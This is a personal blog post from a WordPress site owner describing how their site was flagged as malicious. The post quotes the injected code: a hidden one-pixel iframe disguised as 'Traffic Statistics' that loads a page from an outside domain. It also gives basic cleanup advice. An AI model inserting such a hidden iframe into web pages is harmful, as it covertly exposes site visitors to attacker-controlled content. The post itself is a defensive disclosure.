Today I Google Search for Richard Palace and to my surprise, I found my site, RichardPalace.com, has been identified to contain malicious software. Immediately, I checked with No Script Add-ons for FireFox and discover a domain which is rather unfamiliar. The domain is wp-stats-php.info and I thought the site was related to WordPress correcting some Stats, but it was not. I then checked my site source code for the domain name wp-stats-php and found the following code:

<!– Traffic Statistics –> <iframe src=”http://www.wp-stats-php.info/iframe/wp-stats.php” frameborder=”0″ height=”1″ width=”1″></iframe> <!– End Traffic Statistics –>

This code was inserted on my blog post on 11th Nov 2007 by someone or software. I immediately removed it and asked Google to review my site so as to remove “This site may harm your computer” tag. I am not sure how this iframe code got into my blog. If it happens to me, it can also happen to you.

If you are using wordpress, I suggest you do the following:
1) Upgrade wordpress to the latest version.
2) Change your theme.
3) Check your site source code regularly for “iframe”.

Popularity: 6% [?]

Share and Enjoy:
  • E-mail this story to a friend!
  • YahooMyWeb
  • Google
  • Facebook
  • StumbleUpon
  • Technorati
  • del.icio.us
  • Fark
  • Reddit
  • Mixx
  • BlinkList
  • NewsVine
  • Wikio
  • Furl
  • Netvouz
  • Simpy
  • Bumpzee
  • MisterWong
  • Ma.gnolia
  • Global Grind
  • Spurl
  • Pownce
  • Socialogs
  • LinkaGoGo
  • TwitThis
  • Blogsvine
  • Smarking
  • ppnow

Like this post? Subscribe to my RSS feed and get loads more!